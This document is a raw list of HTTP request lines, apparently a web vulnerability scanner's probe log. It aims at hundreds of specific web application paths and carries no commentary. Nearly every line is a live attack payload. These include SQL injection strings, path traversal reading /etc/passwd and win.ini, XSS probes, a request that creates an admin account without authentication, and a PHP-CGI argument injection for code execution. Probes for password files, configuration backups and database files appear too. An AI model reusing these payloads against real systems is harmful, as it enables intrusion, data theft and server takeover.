GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
GET /Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
GET /main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
GET /index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
GET /website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
GET /varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
POST /getpassword.php?do=login
GET /api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
GET /servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
GET /servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
POST /index.php?m=register&c=ajax_reg
GET /api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
GET /witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
GET /nicknamelogin.jsp
GET /jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
GET /lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
POST /index.php?m=register&c=ajax_reg
GET /inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
GET /ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
GET /utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
POST /?q=node&destination=node
GET /UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
POST /jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
HEAD /govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
GET /down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
POST /api/CheckMemberLogin.ashx?type=mobileisexist
GET /comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
POST /LoginCheck.aspx
GET /NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
GET /index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
GET /Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
GET /show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
GET /NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
GET /NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
GET /NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
GET /NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
GET /zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
GET /AdminP
GET /lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
HEAD /public/download.asp?filename=../login2.asp/
GET /Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
GET /index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
POST /API/DownloadProducts.ashx
GET /Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
GET /ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
GET /SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
POST /MShop/Partial/SuppLogo
POST /ShoppingHandler.aspx
HEAD /bq/Data/BIData.zip
GET /jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
HEAD /vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
POST /cms/voteManager/voteaction.jsp
GET /EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
POST /ShopManage.aspx
GET /RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
POST /SNS/Product/WaterfallProductListData
POST /ProSales/GetListCate
HEAD /jphoto/jphoto/sys/member/opr_export.jsp
POST /JwGl/jxjh/JxjhXGBc.asp
GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
HEAD /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
GET /defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
GET /defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
GET /cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
GET /cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
POST /login.asp
POST /search.php
GET /LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
GET /jwgl/jxjh/jxjha.asp
POST /jwgl/jcxx/savetofile.asp
POST /public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
GET /Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
POST /govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
GET /edoas2/edoas2_test.jsp
GET /Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
POST /celive/live/header.php
GET /SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
HEAD /skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
GET /RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
GET /m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
GET /BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
GET /Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
GET /Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
GET /plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
GET /admin/admin_database.aspx
GET /flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
GET /video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
GET /blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
GET /?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
GET /search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
GET /navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
GET /model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
GET /model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
GET /cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
GET /cctrl/backup/index.php
GET /cctrl/admin/purview/purview.php
HEAD /data_Xbaby/gdjm133950.mdb
GET /admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
GET /admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
GET /admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
POST /admin/upfile.asp
POST /admin/upfile_yqhy.asp
GET /FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
GET /FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
GET /FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
POST /VIEWGOOD/ADI/portal/UserDataSync.aspx
POST /SPM/Pc/Content/Request.aspx?action=name_check
GET /VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
GET /adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
GET /adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
GET /ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
GET /admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
POST /include/upload.asp
GET /TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
GET /TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
GET /Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
GET /WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
GET /WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
GET /Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
GET /Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
GET /products.asp
GET /App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
GET /product_view.asp
HEAD /system/database/data.mdb
POST /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
POST /manage/CHKLOGIN.ASP
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
POST /search.asp
GET /onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
HEAD /db1/%23kepu.mdb
POST /upfile.asp
POST /upfile2.asp
POST /upfile3.asp
HEAD /data/xinfang.mdb
GET /VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
HEAD /gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
GET /Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
POST /WS/WebServiceBase.asmx/GetXMLList
POST /WS/WebService.asmx/GetFile
POST /WS/WebService.asmx/GetFileContent
GET /WS/WebService.asmx
POST /bos/desktop/ajax/EcAjax.aspx
GET /bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
GET /Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
GET /ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
POST /interface/ipsconnect/ipsconnect.php
GET /templates/
GET /service/local/outreach/welcome/nexusSpaces.css
GET /phpRedisAdmin/?overview
GET /?overview
GET /index.html#/dashboard/file/logstash.json
GET /
GET /index.php/weblinks-categories?id=just_test
POST /index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
GET /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
POST /FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
GET /index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
GET /share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
GET /oxoxoxoxoxoxox.com
GET /oxoxoxoxoxoxox.com/
POST /api/xmlrpc
HEAD /wwwroot.rar
HEAD /wwwroot.zip
HEAD /wwwroot.tar.gz
HEAD /web.rar
HEAD /www.rar
HEAD /www.zip
HEAD /www.tar.gz
HEAD /web.zip
GET /crossdomain.xml
PUT /webscan_test.txt
GET /phpinfo.php
GET /info.php
GET /test.php
GET /shop.php?ac=view&shopid=1-cfreer
GET /wp-includes/registration-functions.php
GET /wp-includes/registration.php
GET /
GET /
GET /NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
GET /pass.txt
GET /passwd
GET /password.txt
GET /passwords.txt
GET /users.txt
GET /users.ini
GET /admin.cfg
GET /install.log
GET /database.inc
GET /common.inc
GET /db.inc
GET /connect.inc
GET /conn.inc
GET /sql.inc
GET /.bash_history
GET /.bashrc
GET /Web.config
GET /Global.asax
GET /Global.asa
GET /Global.asax.cs
GET /data.mdb
GET /domcfg.nsf
GET /names.nsf
GET /log.nsf
GET /domlog.nsf
GET /.rediscli_history
GET /data/%23data.mdb
GET /config.inc.php.bak
GET /config/config_ucenter.php.bak
GET /config/config_global.php.bak
GET /uc_server/data/config.inc.php.bak
GET /data/common.inc.php.bak
GET /wp-config.php.bak
GET /WEB-INF/database.properties
GET /
GET /robots.txt
GET /
GET /index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
GET /
GET /nevercouldexistfilenosec
GET /nevercouldexistfilewebsec
GET /nevercouldexistfilenosec.aspx
GET /nevercouldexistfilewebsec.aspx
GET /nevercouldexistfilenosec.shtml
GET /nevercouldexistfilewebsec.shtml
GET /nevercouldexistfilenosec/
GET /nevercouldexistfilewebsec/
GET /nevercouldexistfilenosec.zip
GET /nevercouldexistfilewebsec.zip
GET /nevercouldexistfilenosec.php
GET /nevercouldexistfilewebsec.php
GET /nevercouldexistfilenosec.bak
GET /nevercouldexistfilewebsec.bak
GET /nevercouldexistfilenosec.rar
GET /nevercouldexistfilewebsec.rar
GET /
PUT /jsky_web_scanner_test_file.txt
GET /nosec_Web_Scanner_Test.dll
GET /
GET /wp-admin
GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
GET /admin.php
GET /dede/
GET /administrator/
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
GET /user
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
TRACE /TRACE_test
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
TRACK /TRACK_test
GET /%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
OPTIONS /
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
GET /_vti_bin/_vti_adm/admin.dll
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /_vti_bin/_vti_aut/author.dll
GET /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
GET /_vti_bin/shtml.exe?_vti_rpc
GET /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
GET /server-info
GET /%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
GET /server-status
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
GET /jmx-console/
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
GET /web-console/
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
GET /
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
GET /webscan360noThisFile*~1*/.aspx
POST /cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /.../.../.../.../.../.../.../.../windows/win.ini
